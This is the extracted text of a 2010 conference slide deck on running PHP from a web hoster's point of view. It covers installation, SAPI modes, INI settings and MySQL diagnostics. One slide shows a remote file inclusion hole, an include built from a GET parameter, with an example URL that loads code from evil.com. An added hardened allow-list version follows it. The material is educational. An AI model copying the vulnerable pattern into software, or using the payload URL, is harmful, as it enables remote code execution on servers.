Php through the eyes of a hoster pbc10
1. PHP through the eyes of a hoster
Thijs Feryn
Support manager
+32 (0)9 218 79 06
thijs@combellgroup.com
PHP Barcelona Conference
Saturday October 30th 2010
Barcelona, Spain
11. Goals & motives
Our goals & motives are the same as yours:
• It has to work
• It has to perform
• It has to scale
• It has to be secure
• It has to be available
17. Installing using a package manager (APT/Aptitude)
Install PHP:
server$ apt-get install php5
Install MySQL library for PHP:
server$ apt-get install php5-mysql
18. SAPI ... schmapi
              | Mod_php           | FastCGI                   | CLI
Web           | Apache module     | gateway                   | -
Process       | Apache process    | php-cgi                   | php
Configuration | Apache conf files | wrapper                   | on the fly
User          | Apache user       | shell user or suexec user | shell user
19. FastCGI
Example config:
• Apache handler
<IfModule mod_fcgid.c>
  SuexecUserGroup dev dev
  PHP_Fix_Pathinfo_Enable 1
  <Directory /var/www/dev/www/>
    Options +ExecCGI
    AllowOverride All
    AddHandler fcgid-script .php
    FCGIWrapper /var/www/dev/etc/fcgi.wrapper .php
    Order allow,deny
    Allow from all
  </Directory>
</IfModule>
22. INI settings: tales of good & evil
Defining INI settings:
• Php.ini
• Ini_set()
• “-d”
• php_value
• php_flag
• php_admin_value
• php_admin_flag
23. INI settings: tales of good & evil
Memory_limit:
Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 35 bytes)
25. INI settings: tales of good & evil
Safe_mode & Open_basedir:
<IfModule mod_php5.c>
  php_admin_flag engine on
  php_admin_flag safe_mode off
  php_admin_value open_basedir "/var/www/vhosts/website.com/httpdocs:/tmp"
</IfModule>
26. INI settings: tales of good & evil
Allow_url_fopen:
<?php
$lang= $_GET['lang'];
require("$lang.php");
http://domain.ext/index.php?lang=http://evil.com/hack.txt?
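The include from the slide above in hardened form, as an added example that is not part of the original slides: the request value only selects a key from a fixed allow-list, and a small check reports the INI settings that let include/require reach remote URLs. The language map, the lang/ directory and both function names are assumptions; since PHP 5.2 a remote include also requires allow_url_include, which is off by default.

```php
<?php
// Added example, not from the original slides. The language map and the
// lang/ directory are hypothetical.

/**
 * Map a request value to a file the application ships. The value is only
 * used as a key into the allow-list, never as part of the include path.
 */
function resolve_lang_file($requested, array $allowed, $default)
{
    if (!is_string($requested) || !isset($allowed[$requested])) {
        $requested = $default; // unknown code, URL or array input
    }
    return __DIR__ . '/lang/' . $allowed[$requested];
}

/** List INI settings that let include/require/fopen reach remote URLs. */
function remote_include_findings()
{
    $findings = array();
    foreach (array('allow_url_include', 'allow_url_fopen') as $name) {
        if (filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN)) {
            $findings[] = "$name is enabled";
        }
    }
    return $findings;
}

$allowed = array('en' => 'en.php', 'nl' => 'nl.php', 'es' => 'es.php');

// Constructed inputs: a valid code, the value from the slide's URL, an
// unknown code and an array parameter (?lang[]=nl).
$samples = array('nl', 'http://evil.com/hack.txt?', 'xx', array('nl'));
foreach ($samples as $input) {
    $label = is_array($input) ? '(array)' : $input;
    $file  = resolve_lang_file($input, $allowed, 'en');
    printf("%-28s -> lang/%s\n", $label, basename($file));
}

foreach (remote_include_findings() as $finding) {
    echo "WARNING: $finding\n";
}

// In the application itself:
// require resolve_lang_file(isset($_GET['lang']) ? $_GET['lang'] : 'en', $allowed, 'en');
```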
29. PHP 4: End of life, but far from dead
Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in test.php on line 4
62. mysql> explain SELECT field1, (SELECT COUNT(*) FROM table2 WHERE field3 = table1.id) FROM table1 WHERE field2 = 1 ORDER BY field4 DESC limit 12,12;
*************************** 1. row ***************************
           id: 1
  select_type: PRIMARY
        table: table1
         type: ALL
possible_keys: approved
          key: approved
      key_len: NULL
          ref: NULL
         rows: 3143
        Extra: Using where; Using filesort
*************************** 2. row ***************************
           id: 2
  select_type: DEPENDENT SUBQUERY
        table: table2
         type: ALL
possible_keys: NULL
          key: NULL
      key_len: NULL
          ref: NULL
         rows: 1005
        Extra: Using where
63. mysql> show processlist;
+-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
| Id    | User | Host      | db | Command | Time | State                | Info                                            |
+-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
| 63515 | root | localhost | db | Query   | 0    | NULL                 | show processlist                                |
| 81763 | root | localhost | db | Sleep   | 105  |                      | NULL                                            |
| 85187 | root | localhost | db | Query   | 0    | Sending data         | SELECT data from someTable where field = 'val'  |
| 82701 | root | localhost | db | Query   | 0    | Copying to tmp table | SELECT data from someTable where field='val2'   |
| 82709 | root | localhost | db | Query   | 0    | Sorting result       | SELECT data from someTable where order by field |
| 82716 | root | localhost | db | Query   | 0    | Opening tables       | SELECT data from someOtherTable                 |
+-------+------+-----------+----+---------+------+----------------------+-------------------------------------------------+
71. Summary
1. Hosters are a genuine stakeholder in the PHP universe
2. PHP is highly flexible & configurable. Hosters have to ensure a decent setup
3. PHP has a lot to offer feature-wise
4. PHP attracts a crowd and brings a lot of people together from different industries (e.g. hosters)
5. Lots of abuse cases are PHP related, but that’s not the fault of PHP itself
6. PHP itself doesn’t scale *that* well, but is flexible enough to ensure scalability via extra tools